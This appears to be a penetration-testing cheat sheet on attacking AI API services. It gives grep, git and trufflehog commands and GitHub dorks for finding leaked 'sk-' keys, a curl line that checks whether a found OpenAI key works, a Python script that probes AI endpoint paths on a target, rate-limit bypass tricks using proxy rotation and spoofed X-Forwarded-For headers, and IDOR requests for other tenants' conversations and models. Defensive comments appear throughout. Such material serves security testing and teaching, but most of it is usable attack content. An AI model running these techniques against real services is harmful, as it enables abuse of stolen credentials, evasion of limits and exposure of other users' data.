API & Endpoint Attacks

API Key Enumeration & Abuse

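# Find exposed API keys

# In JavaScript source
# --include lets the recursive search reach *.js files in every directory.
# A bare *.js is expanded by the shell and only covers names in the current
# directory, so nested source files were never searched.
grep -r "sk-" . --include="*.js"
grep -r "OPENAI_API_KEY" .
grep -r "anthropic" . --include="*.js" --include="*.ts"

# In git history
git log --all --oneline
# Feed the revisions through xargs: on a repository with many commits,
# $(git rev-list --all) can exceed the shell's argument-length limit.
git rev-list --all | xargs git grep "sk-"
# --only-verified keeps only credentials trufflehog confirmed as live, which
# means the scan itself sends authentication requests to the provider.
# A key found in history stays valid until it is revoked and rotated;
# removing it from the latest commit does not invalidate it.
trufflehog git file://./repo --only-verified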

# GitHub dorks
site:github.com "OPENAI_API_KEY" "sk-"
site:github.com "anthropic" "claude" "api_key"
site:github.com ".env" "sk-proj-"

# Validate found OpenAI key
# The request asks for the model list visible to the key. HTTP 200 with a
# list means the key is live; 401 means it is invalid or already revoked
# (jq then fails because the error body has no .data array).
# A live key that leaked through source or history stays usable until it is
# revoked at the provider, so rotation and a review of the key's usage logs
# are the remediation, not deleting the file that held it.
curl https://api.openai.com/v1/models \
  -H "Authorization: Bearer sk-FOUND_KEY" | jq '.data[].id'

Model API Endpoint Fuzzing

import requests

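base = "https://target.com"
headers = {"Authorization": "Bearer YOUR_TOKEN"}

# Common AI API paths to probe.
# Each of these should enforce authentication and per-role authorization on
# the server; the finding is a path that answers with data for a token that
# should not have access to it.
endpoints = [
    "/api/chat", "/api/v1/chat", "/api/v2/chat",
    "/v1/messages", "/v1/completions", "/v1/chat/completions",
    "/api/generate", "/api/query", "/api/ai",
    "/api/llm", "/api/model", "/api/inference",
    "/api/prompt", "/api/ask", "/api/answer",
    "/api/admin/config",  # Admin endpoints
    "/api/system-prompt",  # Exposed system prompt
    "/api/models",          # Model listing
    "/api/embeddings",      # Embedding endpoint
    "/api/rag/query",       # RAG endpoint
    "/api/knowledge-base",  # KB management
]

# Reading the output:
#   401 / 403  the route exists and access control answered; not a finding
#              by itself.
#   405        the route exists but does not accept GET.
#   200        compare the body with what this token's role should see.
# The first 100 bytes of a body can already hold a system prompt or config
# value, so treat the printed output as sensitive.
# On the server side this sweep appears as one client requesting many
# unrelated API paths within seconds, most of them answered with 404.
for ep in endpoints:
    try:
        # Report the endpoint's own status. With redirects followed, a 302 to
        # a login page would be printed as a 200 and read as an open route.
        r = requests.get(
            base + ep, headers=headers, timeout=5, allow_redirects=False
        )
    except requests.RequestException as exc:
        # A timeout or connection error on one path must not end the sweep.
        print(f"[!] {ep} - request failed: {exc}")
        continue
    if r.status_code != 404:
        print(f"[+] {r.status_code} {ep} - {r.text[:100]}")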

Rate Limit Bypass

# Rate limits are usually keyed on the client IP or on the API token.
# Techniques listed against them:

# 1. Rotate IPs (proxies)
proxies = []
for i in range(10):
    proxies.append({"http": f"http://proxy{i}:3128"})

# 2. Header manipulation
# This only has an effect when the application reads the client address from
# a request header without checking that its own reverse proxy set it.
# Defence: take the address from the trusted proxy hop only, and key the
# limit on the authenticated account as well as the IP.
headers.update({
    "X-Forwarded-For": "1.2.3.4",  # Some apps use this for rate limit key
    "X-Real-IP": "1.2.3.5",
})

# 3. Different user agents
# 4. HTTP/2 multiplexing — send multiple requests in one connection
# 5. Long prompts instead of many short prompts (token-based bypass)
# 6. Use free tier endpoints vs paid tier
# 7. Websocket connections (if available) — often have different rate limits
#
# Items 4, 5 and 7 typically work where the limiter counts connections or
# requests. Metering tokens per account, and applying one limiter to every
# transport (HTTP/2 streams and WebSocket messages included), addresses them.

IDOR in Multi-Tenant AI Systems

# Access other users' conversation histories
GET /api/conversations/CONVERSATION_ID
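# Enumerate IDs: 1, 2, 3 or use UUIDs found elsewhere. Random IDs only slow guessing; the flaw is a server that does not check the object belongs to the caller's tenant.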

# Access other users' knowledge bases
GET /api/knowledge-base/KB_ID/documents

# Access other users' fine-tuned models
POST /api/model/OTHER_USER_MODEL_ID/query

# Export conversation in another user's session
GET /api/export?session_id=OTHER_SESSION&format=json